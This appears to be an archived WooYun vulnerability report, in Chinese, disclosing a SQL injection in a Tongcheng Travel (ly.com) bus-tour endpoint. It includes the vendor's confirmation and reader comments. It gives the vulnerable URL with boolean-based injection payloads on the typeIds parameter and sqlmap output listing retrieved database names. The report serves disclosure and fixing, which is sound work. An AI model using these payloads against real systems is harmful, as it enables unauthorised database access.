同程旅游网主站的一处SQL注入

编号196030
Urlhttp://www.wooyun.org/bug.php?action=view&id=196030
漏洞状态厂商已经确认
漏洞标题同程旅游网主站的一处SQL注入
漏洞类型SQL注射漏洞
厂商苏州同程旅游网络科技有限公司
白帽子李长歌
提交日期2016-04-13 23:27:00
公开日期2016-05-29 01:40:00
修复时间(not set)
确认时间2016-04-14 00:00:00
Confirm Spend1
漏洞标签php+字符类型注射 注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank18
漏洞简介
主站为什么没有WAF呢。
漏洞细节

http://www.ly.com/bustour/json/GetOpenedCityList.html?OrdTypeId=165&typeIds=155,156,157)%20and%20104=104--%20&iid=0.16461771167814732 有数据

QQ截图20160413221558.jpg


http://www.ly.com/bustour/json/GetOpenedCityList.html?OrdTypeId=165&typeIds=155,156,157)%20and%20104=105--%20&iid=0.16461771167814732 没有数据

QQ截图20160413221544.jpg


放入SQLmap中注入

QQ截图20160413220844.jpg

POC

部分测试的数据

[22:09:27] [INFO] retrieved: TcShortTourResource
[22:10:52] [INFO] retrieved: master
[22:11:11] [INFO] retrieved: tempdb
[22:11:32] [INFO] retrieved: model
[22:11:54] [INFO] retrieved: msdb
[22:12:19] [INFO] retrieved: TcShortTourDCResource
[22:13:28] [INFO] retrieved: TcShortTourLog
[22:14:21] [INFO] retrieved: TcShortTourOrder
[22:15:19] [INFO] retrieved: TcShortTourResource
[22:16:34] [INFO] retrieved: TcShortTourShop
[22:17:35] [INFO] retrieved: TcShortTourStatement
...


QQ截图20160413224106.jpg

修复方案

typeIds参数进行过滤下,加入WAF

状态信息 2016-04-13: 细节已通知厂商并且等待厂商处理中
2016-04-14: 厂商已经确认,细节仅向厂商公开
2016-04-24: 细节向核心白帽子及相关领域专家公开
2016-05-04: 细节向普通白帽子公开
2016-05-14: 细节向实习白帽子公开
2016-05-29: 细节向公众公开
厂商回复感谢关注同程旅游,WAF这些天确实临时下线了。
回应信息危害等级:高漏洞Rank:18 确认时间:2016-04-14 01:31
Showing 1-12 of 12 items.
评论内容评论人点赞数评论时间

运气真好~

qhwlpg02016-05-15 21:20:00

刚收了给发的京东卡,同程安全还是挺不错的,感谢。

李长歌02016-05-09 17:31:00

内幕

纯情02016-04-14 12:16:00

为啥大家总是在waf关闭的时候挖到漏洞呢

Taro02016-04-14 09:13:00

waf是谁?

幻老头儿02016-04-14 09:01:00

waf这几天有事..大表哥,你要不要这么厉害。

whynot02016-04-14 08:30:00

WAF为什么要下线?换一种?

大师兄02016-04-14 08:19:00

牛逼

qhwlpg02016-04-14 06:52:00

waf....

Aasron02016-04-14 00:16:00

估计厂商回复,好尴尬吖,刚关waf你就来

onpu02016-04-14 00:07:00

额。。。没waf,表哥怎么看?

紫霞仙子02016-04-13 23:48:00

大表哥,你要不要这么厉害。

_Thorns02016-04-13 23:28:00